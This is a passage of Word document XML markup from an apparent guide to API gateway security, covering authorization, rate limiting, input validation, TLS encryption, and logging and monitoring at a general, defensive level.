          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use scopes in OAuth and claims in JWTs to specify and verify permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A5751E"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Implementation Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B031A" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RBAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Define roles and permissions in a policy, and enforce them at the API gateway level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E02B204" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scopes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Check the scopes included in the OAuth token to determine if the client has access to the requested resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78743EC8" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Rate Limiting and Throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E997E43"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Control the number of requests a client can make to prevent abuse and ensure fair usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018D90B5"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Measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF5245B" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Set limits on the number of requests a client can make in a given time period (e.g., 1000 requests per hour).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D807E2C" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Throttling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement throttling to manage request bursts and prevent overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15750510"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Implementation Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454FF2F1" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use a rate-limiting algorithm (e.g., token bucket, leaky bucket) to track and enforce request limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2727EB9F" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Throttling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement dynamic throttling based on current load and traffic patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4186E94F" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Input Validation and Sanitization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB15E87"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Ensure that input data is valid and does not contain malicious content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0284514A"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Measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F3B42" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Validate request parameters, headers, and payloads to ensure they meet expected formats and constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14010F60" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sanitization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Remove or encode potentially harmful characters from input data to prevent injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B7896E"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Implementation Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271FF33D" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Input Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use schemas or validation libraries to enforce data types, formats, and constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC3406F" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sanitization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement libraries or middleware to sanitize input before processing or forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B8A8F" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Encryption and Secure Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F7E8C"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Protect data in transit and ensure secure communication channels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B6783B"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Measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F5231" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TLS/SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use TLS (Transport Layer Security) to encrypt data transmitted between clients and the API gateway, and between the API gateway and backend services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170E4B7" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>End-to-End Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that data is encrypted from the client through to the backend services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6302FBD2"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Implementation Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0483A21A" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TLS/SSL Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Configure the API gateway to use TLS certificates and enforce HTTPS for all communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EE7338" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Certificate Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly update and manage TLS certificates to maintain security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC718E3" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Logging and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712ABBC"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Monitor traffic and detect anomalies or potential security threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62531B18"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Measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294352B8" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Access Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Maintain detailed logs of requests, responses, and errors to track activity and diagnose issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C91F02" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use monitoring tools to track performance, detect anomalies, and alert on suspicious activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7521D"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Implementation Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD5F9D3" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Log Aggregation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Collect and analyze logs using tools like ELK Stack (Elasticsearch, Logstash, Kibana) or cloud-based solutions like AWS CloudWatch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDE04F2" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Anomaly Detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Set up monitoring rules to detect unusual patterns or spikes in traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167083F8" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
